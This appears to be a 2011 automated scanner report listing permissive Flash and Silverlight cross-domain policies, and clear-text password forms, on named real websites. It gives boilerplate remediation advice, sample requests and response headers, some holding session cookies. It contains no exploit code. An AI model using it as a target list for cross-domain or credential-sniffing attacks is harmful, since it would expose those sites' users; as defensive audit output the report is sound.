Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: current.com
Response
HTTP/1.0 200 OK Last-Modified: Tue, 11 May 2010 19:15:29 GMT Accept-Ranges: bytes Content-Length: 676 Content-Type: text/xml Date: Sat, 05 Feb 2011 22:47:25 GMT Server: Apache Vary: Accept-Encoding X-Cache: HIT from current.com X-Cache-Lookup: HIT from current.com:3128 Via: 1.0 current.com:3128 (squid) Connection: close Keep-Alive: timeout=30, max=100
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"315-1288858532000" Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT Content-Type: application/xml Content-Length: 315 Date: Sun, 06 Feb 2011 17:44:28 GMT Connection: close Server: Apache
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: developers.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 Connection: close Content-Length: 1581
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: friendfeed.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:49:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 321 Vary: Cookie Server: FriendFeedServer/0.1 Etag: "d69a789b2865b15041af5e97e97c7b933b34666a" Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=9279066392190907013_1296946152; Domain=.friendfeed.com; Path=/
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: geo.yahoo.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:48:41 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 05 Feb 2011 19:02:26 GMT Expires: Sun, 06 Feb 2011 19:02:26 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 9977 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: messenger.yahoo.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/x-httpd-php
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: multiply.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: Apache/1.3.29 (Unix) mod_perl/1.29 Set-Cookie: uid=A:1:U2FsdGVkX19SPjRxOe1rQKRUhZatqSHTVwUlBeBnB-hm4X.cCUH0Pw%3d%3d:mgkwrbaa8gcoowdw3utv5rp; domain=multiply.com; path=/ Set-Cookie: session=1296946703:1296946703:1296946703:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT Set-Cookie: session=1296946703::1296946703:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE" Expires: Wed, 13 Apr 2005 10:02:00 GMT Pragma: no-cache Cache-Control: max-age=0 Content-Type: text/html; charset=utf-8 X-Cache: MISS from multiply.com Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: officedepot.shoplocal.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 18 Jan 2011 23:05:52 GMT Accept-Ranges: bytes ETag: "0c8ae4064b7cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Content-Length: 5172 Date: Sat, 05 Feb 2011 22:58:22 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: posterous.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 05 Feb 2011 22:58:38 GMT Content-Type: text/xml Content-Length: 293 Last-Modified: Wed, 01 Dec 2010 02:16:37 GMT Connection: close Expires: Mon, 07 Mar 2011 22:58:38 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Sat, 05 Feb 2011 23:01:19 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.amazon.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:33 GMT Server: Server Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT ETag: "3e0-8d97ef00" Accept-Ranges: bytes Content-Length: 992 Vary: Accept-Encoding,User-Agent Cneonction: close Content-Type: text/xml Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.arto.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 18 Jan 2011 10:00:07 GMT Accept-Ranges: bytes ETag: "8ce4477cf6b6cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:01:07 GMT Connection: close Content-Length: 959
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.bebo.com
Response
HTTP/1.0 200 OK Server: Resin/3.0.24 ETag: "GVbY6cyl+Xo" Last-Modified: Wed, 17 Mar 2010 18:37:48 GMT Content-Type: text/xml Content-Length: 798 Date: Sat, 05 Feb 2011 23:01:30 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.box.net
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 05 Feb 2011 23:01:34 GMT Content-Type: application/xml Connection: close Last-Modified: Fri, 28 Jan 2011 03:09:12 GMT ETag: "18b1628-436-4d423358" Accept-Ranges: bytes Content-Length: 1078
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hyves.nl
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:02:25 GMT Content-Type: text/xml Content-Length: 264 Last-Modified: Fri, 27 Aug 2010 08:58:52 GMT Connection: close Expires: Sat, 05 Feb 2011 23:02:24 GMT Cache-Control: no-cache Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.myspace.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.netlog.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:52 GMT Server: Apache/2.2.14 Cache-Control: max-age=3600 Expires: Sun, 06 Feb 2011 00:02:52 GMT Last-Modified: Sat, 05 Feb 2011 23:02:52 GMT Vary: Accept-Encoding Content-Length: 324 Connection: close Content-Type: text/xml; charset=UTF-8
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.netvibes.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sat, 05 Feb 2011 23:02:57 GMT Content-Type: text/xml Connection: close X-Men: 34 Accept-Ranges: bytes Last-Modified: Wed, 27 May 2009 07:32:50 GMT Content-Length: 211 X-slb: 1 X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.newsvine.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:57 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:55 GMT ETag: "119c048-191-492fdc74df9c0" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=992 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.nowpublic.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:57 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n31), rf-ht iad-agg-n31 ( origin>CONN) ETag: "1cc885c-10b-45dc07a6e5e00"-gzip Cache-Control: max-age=900 Expires: Sat, 05 Feb 2011 23:17:57 GMT Age: 0 Content-Length: 267 Content-Type: application/xml Last-Modified: Thu, 11 Dec 2008 07:39:36 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.vodafone.de
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:41:00 GMT Server: Apache Last-Modified: Thu, 08 Nov 2007 15:51:45 GMT Accept-Ranges: bytes Content-Length: 309 P3P: CP="NOI DSP LAW CURa OUR NOR PUR COM NAV INT STA" Vary: User-Agent Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: faves.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml Date: Sat, 05 Feb 2011 22:49:11 GMT Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 207 Connection: Close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="bluedot.us" /></cross-domain- ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.livejournal.com
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:02:39 GMT Server: Apache/2.2.3 (CentOS) X-AWS-Id: ws30 Set-Cookie: ljuniq=8aewGz0beafsS0b:1296946959:pgstats0:m0; expires=Wednesday, 06-Apr-2011 23:02:39 GMT; domain=.livejournal.com; path=/ Last-Modified: Fri, 18 Jun 2010 18:14:49 GMT ETag: "da9476-238-48951ee3a5840" Accept-Ranges: bytes Content-Length: 568 Connection: close Content-Type: text/xml
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad-emea.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.de.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 18:54:04 GMT Date: Sat, 05 Feb 2011 21:49:03 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Mon, 07 Feb 2011 13:40:00 GMT Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: clk.redcated
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 312 Content-Type: text/xml Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT Accept-Ranges: bytes ETag: "9e243e8fb90c81:6e7" Connection: close Date: Sat, 05 Feb 2011 22:47:12 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: enterprisemediagroup.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:54 GMT Server: Omniture DC/2.0.0 xserver: www146 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.blackberry.com
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:32:29 GMT Server: Omniture DC/2.0.0 xserver: www9 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: msdn.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:58:27 GMT Connection: keep-alive Content-Length: 339
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.redcated
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Wed, 09 Feb 2011 10:29:32 GMT Date: Sun, 06 Feb 2011 13:22:29 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www91.intel.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:49 GMT Server: Omniture DC/2.0.0 xserver: www652 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ziffdavisbaseline.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:31 GMT Server: Omniture DC/2.0.0 xserver: www121 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"1167-1291379570000" Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT Content-Type: application/xml Content-Length: 1167 Date: Sun, 06 Feb 2011 17:44:28 GMT Connection: close Server: Apache
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: officedepot.shoplocal.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 24 Feb 2010 18:37:08 GMT Accept-Ranges: bytes ETag: "0a2895e80b5ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Content-Length: 950 Date: Sat, 05 Feb 2011 22:58:22 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=900 Content-Type: text/xml Last-Modified: Tue, 12 May 2009 23:10:10 GMT Accept-Ranges: bytes ETag: "c4640cc56d3c91:0" Server: Microsoft-IIS/7.5 VTag: 438359342200000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:02:43 GMT Connection: keep-alive Content-Length: 572
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /rmb-account/login-page HTTP/1.1 Host: channelmarketing.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:51 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14989
GET / HTTP/1.1 Host: fussballmania.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://hhonors1.hilton.com/en_US/hh/home_index.do
The form contains the following password field:
password
Request
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:23 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field:
Password
Request
